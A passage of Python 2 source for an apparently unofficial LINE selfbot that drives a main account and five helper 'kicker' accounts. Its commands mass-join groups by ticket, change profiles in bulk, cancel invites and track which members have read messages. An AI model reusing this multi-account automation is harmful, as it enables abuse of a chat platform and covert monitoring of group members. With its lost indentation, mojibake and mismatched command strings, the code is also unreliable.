msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
# ki6 is not logged in in this build (see the commented ASUL section above), so its contact is skipped
#msg.contentType = 13
#msg.contentMetadata = {'mid': ki6mid}
#ki6.sendMessage(msg)
elif "As1" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
elif "As2" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
elif "As3" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
elif "As4" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
elif "As5" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
elif msg.text in ["Bot1 Gift","As1 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text in ["Gift","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Bot2 Gift","As2 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["Bot3 Gift","As3 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["Bot4 Gift","As4 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki4.sendMessage(msg)
elif msg.text in ["Allgift","All Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
cl.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
elif msg.text in ["Cancel","cancel","ยกเชิญ","ยก"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No invites👈")
else:
cl.sendText(msg.to,"Invite people inside not👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan👈")
else:
cl.sendText(msg.to,"invitan tidak ada")
elif "Contact" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.to}
cl.sendMessage(msg)
elif "As1 mid" == msg.text:
ki.sendText(msg.to,kimid)
elif "As2 mid" == msg.text:
ki2.sendText(msg.to,ki2mid)
elif "As3 mid" == msg.text:
ki3.sendText(msg.to,ki3mid)
elif "As4 mid" == msg.text:
ki4.sendText(msg.to,ki4mid)
elif "As5 mid" == msg.text:
ki5.sendText(msg.to,ki5mid)
elif "All mid" == msg.text:
ki.sendText(msg.to,kimid)
ki2.sendText(msg.to,ki2mid)
ki3.sendText(msg.to,ki3mid)
ki4.sendText(msg.to,ki4mid)
ki5.sendText(msg.to,ki5mid)
elif "Mic:" in msg.text:
mmid = msg.text.replace("Mic:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif "Timeline: " in msg.text:
tl_text = msg.text.replace("Timeline: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Allname: " in msg.text:
string = msg.text.replace("Allname: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
elif "Allbio: " in msg.text:
string = msg.text.replace("Allbio: ","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki2.getProfile()
profile.statusMessage = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki3.getProfile()
profile.statusMessage = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki4.getProfile()
profile.statusMessage = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki5.getProfile()
profile.statusMessage = string
ki5.updateProfile(profile)
#---------------------------------------------------------
elif "Name:" in msg.text:
string = msg.text.replace("Name:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"The name " + string + " I did NI change。")
elif "Name Bot" in msg.text:
string = msg.text.replace("Name Bot","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki2.updateProfile(profile)
ki3.updateProfile(profile)
ki4.updateProfile(profile)
ki5.updateProfile(profile)
cl.sendText(msg.to,"The name " + string + " I did NI change。")
#---------------------------------------------------------
elif "K1 upname:" in msg.text:
string = msg.text.replace("K1 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K2 upname:" in msg.text:
string = msg.text.replace("K2 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
ki2.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K3 upname:" in msg.text:
string = msg.text.replace("K3 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
ki3.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K4 upname:" in msg.text:
string = msg.text.replace("K4 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
ki4.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K5 upname:" in msg.text:
string = msg.text.replace("K5 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
ki5.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
#--------------------------------------------------------
elif msg.text.lower() == 'allin':
Ticket = cl.reissueGroupTicket(msg.to)
invsend = 0.22222
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.021)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
print "kicker ok"
#======================================================#
elif msg.text in ["Notifed on","เปิดแจ้งเตือน","M on"]:
if msg.from_ in admin:
if wait["Notifed"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของค���ณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
elif msg.text in ["Notifed off","ปิดแจ้งเตือน","M off"]:
if msg.from_ in admin:
if wait["Notifed"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
#======================================================#
#-----------------------------------------------
elif "Mic: " in msg.text:
mmid = msg.text.replace("Mic: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text.lower() == 'contact on':
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah On")
else:
cl.sendText(msg.to,"It is already open")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already open 👈")
else:
cl.sendText(msg.to,"It is already open ")
elif msg.text.lower() == 'contact off':
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"sudah off 👈")
else:
cl.sendText(msg.to,"It is already off 👈")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"off already")
else:
cl.sendText(msg.to,"already Close 👈")
elif msg.text.lower() == 'protect on':
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'qrprotect on':
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on ��")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'inviteprotect on':
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'cancelprotect on':
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'join on':
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah off 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON")
else:
cl.sendText(msg.to,"It is already On ô€¨")
elif msg.text in ["Allprotect on","Panick:on"]:
if msg.from_ in admin:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Already on")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect invite on ")
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Already on")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel on ")
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Already on")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect on ")
else:
cl.sendText(msg.to,"Already on")
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Already on")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR on ")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Allprotect off","Panick:off"]:
if msg.from_ in admin:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah off 👈")
else:
cl.sendText(msg.to,"Already off")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect invite off ")
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah off 👈")
else:
cl.sendText(msg.to,"Already off")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel off ")
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah off 👈")
else:
cl.sendText(msg.to,"Already off")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect off ")
else:
cl.sendText(msg.to,"Already off")
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah off 👈")
else:
cl.sendText(msg.to,"Already off")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR off ")
else:
cl.sendText(msg.to,"Already off")
elif msg.text.lower() == 'join off':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Join Already Off")
else:
cl.sendText(msg.to,"Auto Join set off")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text in ["Protect off"]:
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"hall ini sudah off ô€œ👈")
else:
cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text in ["Qrprotect off","qrprotect off"]:
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"hall ini sudah off ô€œ👈")
else:
cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text in ["Inviteprotect off"]:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"hall ini sudah off ô€œ👈")
else:
cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text in ["Cancelprotect off"]:
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"hall ini sudah off ô€œ👈")
else:
cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
elif "Gcancel:" in msg.text:
if msg.from_ in admin:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Leave on","Auto leave: on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"Sudah terbuka ")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"Is already open👈")
elif msg.text in ["Leave off","Auto leave: off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"Sudah off👈")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"Is already close👈")
elif msg.text in ["Share on","share on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done ")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka👈")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"on👈")
elif msg.text in ["Share off","share off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"It is already turned off 👈")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off👈")
else:
cl.sendText(msg.to,"Off👈")
elif msg.text in ["Welcome:on"]:
if msg.from_ in admin:
if wait["welcomemsg"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on")
elif msg.text in ["Welcome:off"]:
if msg.from_ in admin:
if wait["welcomemsg"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text.lower() == 'set':
md = ""
if wait["contact"] == True: md+="☞ Contact → ✔\n"
else: md+="🔚 Contact → ❎\n"
if wait["autoJoin"] == True: md+="☞ Auto Join → ✔\n"
else: md+="🔚 Auto Join → ❎\n"
if wait["autoCancel"]["on"] == True:md+="☞ Auto cancel: " + str(wait["autoCancel"]["members"]) + " → ✔\n"
else: md+="🔚 Group cancel → ❎\n"
if wait["leaveRoom"] == True: md+="☞ Auto leave → ✔\n"
else: md+="🔚 Auto leave → ❎\n"
if wait["timeline"] == True: md+="☞ share → ✔\n"
else:md+="🔚 Share → ❎\n"
if wait["autoAdd"] == True: md+="☞ Auto add → ✔\n"
else:md+="🔚 Auto add → ❎\n"
if wait["commentOn"] == True: md+="☞ Auto komentar → ✔\n"
else:md+="🔚 Auto komentar → ❎\n"
if wait["protect"] == True: md+="☞ Protect → ✔\n"
else:md+="🔚 Protect → ❎\n"
if wait["linkprotect"] == True: md+="☞ Link Protect → ✔\n"
else:md+="🔚 Link Protect → ❎\n"
if wait["inviteprotect"] == True: md+="☞ Invitation Protect → ✔\n"
else:md+="🔚 Invitation Protect → ❎\n"
if wait["cancelprotect"] == True: md+="☞ Cancel Protect → ✔\n"
else:md+="🔚 Cancel Protect → ❎\n"
if wait["likeOn"] == True: md+="☞ Auto like → ✔\n"
else:md+="🔚 Auto like → ❎\n" + datetime.now().strftime('\n📅%Y/%m/%d 🕛 %H:%M:%S')
cl.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': admsa}
cl.sendMessage(msg)
elif msg.text in ["Like:on"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["いいね:オフ","Like:off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Add on","Add auto on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On")
else:
cl.sendText(msg.to,"Already On👈")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On👈")
else:
cl.sendText(msg.to,"Already On👈")
elif msg.text in ["Add off","Add auto off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off👈")
else:
cl.sendText(msg.to,"Hal ini sudah dimatikan👈")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already Off👈")
else:
cl.sendText(msg.to,"Untuk mengaktifkan-off👈")
elif "Message set: " in msg.text:
wait["message"] = msg.text.replace("Message set: ","")
cl.sendText(msg.to,"We changed the message👈")
elif "Help set: " in msg.text:
wait["help"] = msg.text.replace("Help set: ","")
cl.sendText(msg.to,"We changed the Help👈")
elif "Pesan add: " in msg.text:
wait["message"] = msg.text.replace("Pesan add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kami mengubah pesan🛡")
else:
cl.sendText(msg.to,"Change information")
elif msg.text in ["Pesan add cek","Message Confirmation"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Additional information is automatically set to the following \n\n" + wait["message"])
else:
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif msg.text in ["Change","change"]:
if wait["lang"] =="JP":
wait["lang"] = "TW"
cl.sendText(msg.to,"I changed the language to engglis👈")
else:
wait["lang"] = "JP"
cl.sendText(msg.to,"I changed the language to indonesia👈")
elif "Message set: " in msg.text:
c = msg.text.replace("Message set: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Is a string that can not be changed👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"This has been changed👈\n\n" + c)
elif "Comment set: " in msg.text:
c = msg.text.replace("Comment set: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"Ini telah diubah👈\n\n" + c)
elif msg.text in ["Com on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku berada di👈")
else:
cl.sendText(msg.to,"To open👈")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"オンã«ã—ã¾ã—ãŸ👈")
else:
cl.sendText(msg.to,"è¦äº†å¼€👈")
elif msg.text in ["Com off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off")
else:
cl.sendText(msg.to,"It is already turned off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off👈")
else:
cl.sendText(msg.to,"To turn off")
elif "Update welcome:" in msg.text:
if msg.from_ in admin:
wait["welmsg"] = msg.text.replace("Update welcome:","")
cl.sendText(msg.to,"update welcome message succes"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check welcome message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["welmsg"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["welmsg"])
elif msg.text in ["Com","Comment"]:
cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:👈\n\n" + str(wait["comment"]))
elif msg.text in ["Com Bl"]:
wait["wblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklistô€œô€…”👈")
elif msg.text in ["Com hapus Bl"]:
wait["dblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklistô€œô€…”👈")
elif msg.text in ["Com Bl cek"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"Nothing in the blacklistô€œ🛡")
else:
cl.sendText(msg.to,"The following is a blacklistô€œ👈")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'jam on':
if wait["clock"] == True:
cl.sendText(msg.to,"Sudah On")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"👉Jam on👈")
elif msg.text.lower() == 'jam off':
if wait["clock"] == False:
cl.sendText(msg.to,"Hal ini sudah off🛡")
else:
wait["clock"] = False
cl.sendText(msg.to,"Adalah Off")
elif "Jam say: " in msg.text:
n = msg.text.replace("Jam say: ","")
if len(n.decode("utf-8")) > 30:
cl.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
cl.sendText(msg.to,"Ini telah diubah🛡\n\n" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Diperbarui👈")
else:
cl.sendText(msg.to,"Silahkan Aktifkan Nama")
elif msg.text in ["Point","นับ"]:
if msg.toType == 2:
cl.sendText(msg.to, "ตั้งจุดเช็คคนอ่าน:" + datetime.now().strftime('\n📅%Y/%m/%d 🕛 %H:%M:%S'))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('📅%Y-%m-%d 🕛 %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text in ["Read","อ่าน"]:
if msg.toType == 2:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "==============================\nActive readers:%s\n\n\n\nPassive readers:\n%s\n\n==============================\nIn the last seen point:\n[%s]\n==============================\n Powered By: kieselfbotline" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
print "ReadPoint Set..."
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('📅%Y-%m-%d 🕛 %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
cl.sendText(msg.to, "Auto set reading point in:" + datetime.now().strftime('\n📅%Y-%m-%d 🕛 %H:%M:%S'))
else:
cl.sendText(msg.to, "Reading point has not been set.")
#-----------------------[Add Staff Section]------------------------
elif "Add staff @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff add executing"
_name = msg.text.replace("Add staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove staff @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff remove executing"
_name = msg.text.replace("Remove staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Stafflist","stafflist"]:
if staff == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Staff list: ")
mc = ""
for mi_d in staff:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#-----------------------------------------------------------
elif msg.text in ["Group creator","Gc","Gcreator","gcreator"]:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': gCreator}
cl.sendMessage(msg)
cl.sendText(msg.to,"""╔══════════════
💥ผู้สร้างกลุ่ม Creator 💥Group""")
#-----------------------------------------------------------
elif "Getname" in msg.text:
